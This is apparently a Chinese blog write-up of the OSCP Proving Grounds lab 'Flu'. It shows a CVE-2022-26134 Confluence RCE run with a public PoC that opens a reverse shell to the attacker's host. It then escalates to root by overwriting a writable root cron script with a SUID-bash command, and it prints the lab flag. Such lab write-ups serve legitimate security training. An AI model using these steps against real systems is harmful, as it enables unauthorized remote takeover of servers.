OSCP - Proving Grounds - Flu

柴郡猫^O^

已于 2024-09-26 11:20:23 修改

阅读量495

点赞数 11

CC 4.0 BY-SA版权

分类专栏： OSCP 文章标签：网络安全安全性测试

于 2024-09-25 19:20:28 首次发布

本文链接：https://blog.youkuaiyun.com/N61320/article/details/142496066

OSCP 专栏收录该内容

75 篇文章

订阅专栏

主要知识点

观察linpeas.sh 扫描结果
pspy64观察进程

具体步骤

执行nmap扫描，nmap -p- -sV -A #remote_ip#,结果比较长，截取一部分

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-24 07:59 UTC
Nmap scan report for #remote_ip#
Host is up (0.0010s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 02:79:64:84:da:12:97:23:77:8a:3a:60:20:96:ee:cf (ECDSA)
|_  256 dd:49:a3:89:d7:57:ca:92:f0:6c:fe:59:a6:24:cc:87 (ED25519)
8090/tcp open  opsmessaging?
8091/tcp open  jamlink?

访问8090端口，发现是confluence 7.13.6

搜索一下发现该版本有RCE漏洞，详情请参考A dive into CVE-2022–26134, an Atlassian Confluence Unauthenticated RCE，对应的PoC也有很多，有的不太好用，GitHub - jbaines-r7/through_the_wire: CVE-2022-26134 Proof of Concept 质量不错,reverse shell创建成功，并可以获得第一个flag

C:\home\kali\Documents\OFFSEC\GoToWork\Flu\through_the_wire-main> python through_the_wire.py --rhost #remote_ip# --rport 8090 --lhost #local_ip# --protocol http:// --reverse-shell

   _____ _                           _     
  /__   \ |__  _ __ ___  _   _  __ _| |__  
    / /\/ '_ \| '__/ _ \| | | |/ _` | '_ \ 
   / /  | | | | | | (_) | |_| | (_| | | | |
   \/   |_| |_|_|  \___/ \__,_|\__, |_| |_|
                               |___/       
   _____ _            __    __ _           
  /__   \ |__   ___  / / /\ \ (_)_ __ ___  
    / /\/ '_ \ / _ \ \ \/  \/ / | '__/ _ \ 
   / /  | | | |  __/  \  /\  /| | | |  __/ 
   \/   |_| |_|\___|   \/  \/ |_|_|  \___| 

                 jbaines-r7                
               CVE-2022-26134              
      "Spit my soul through the wire"    
                     🦞                   

[+] Forking a netcat listener
[+] Using /usr/bin/nc
[+] Generating a reverse shell payload
[+] Sending expoit at http://#remote_ip#:8090/
listening on [any] 1270 ...
connect to [#local_ip#] from (UNKNOWN) [#remote_ip#] 45618
bash: cannot set terminal process group (841): Inappropriate ioctl for device
bash: no job control in this shell
confluence@flu:/opt/atlassian/confluence/bin$ id
id
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)

上传linpeas.sh和pspy64到remote server,在linpeas.sh结果中发现 /opt/log-backup.sh比较可疑，但没找到对应的cron job（可能是我不够仔细），上传pspy64并运行后发现，root会定期运行/opt/log-backup.sh

-rwxr-xr-x 1 confluence confluence 408 Dec 12  2023 /opt/log-backup.sh

2024/09/24 09:41:24 CMD: UID=103  PID=1013   | /usr/sbin/rsyslogd -n -iNONE 
2024/09/24 09:41:24 CMD: UID=109  PID=1011   | /usr/sbin/mysqld 
2024/09/24 09:41:24 CMD: UID=0    PID=101    | 
2024/09/24 09:41:24 CMD: UID=0    PID=10     | 
2024/09/24 09:41:24 CMD: UID=0    PID=1      | /sbin/init 
2024/09/24 09:42:01 CMD: UID=0    PID=25851  | /usr/sbin/CRON -f -P 
2024/09/24 09:42:01 CMD: UID=0    PID=25853  | /bin/bash /opt/log-backup.sh 
2024/09/24 09:42:01 CMD: UID=0    PID=25852  | /bin/sh -c /opt/log-backup.sh 
2024/09/24 09:42:01 CMD: UID=0    PID=25855  | cp -r /opt/atlassian/confluence//logs /root/backup/log_backup_20240924094201 
2024/09/24 09:42:01 CMD: UID=0    PID=25856  | tar -czf /root/backup/log_backup_20240924094201.tar.gz /root/backup/log_backup_20240924094201 
2024/09/24 09:42:01 CMD: UID=0    PID=25857  | /bin/sh -c gzip 
2024/09/24 09:42:01 CMD: UID=0    PID=25858  | gzip

修改/opt/log-backup.sh为，当其被执行时，赋予/bin/bash SUID权限，过一会儿后，获得root权限

confluence@flu:/opt$ echo "chmod +s /bin/bash" > /opt/log-backup.sh
echo "chmod +s /bin/bash" > /opt/log-backup.sh
confluence@flu:/opt$ cat log-backup.sh
cat log-backup.sh
chmod +s /bin/bash
confluence@flu:/opt$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1437832 Jan  7  2023 /bin/bash
confluence@flu:/opt$ /bin/bash -p
/bin/bash -p
cat /root/proof.txt
318d2e991abbe18362d7d2982c53f941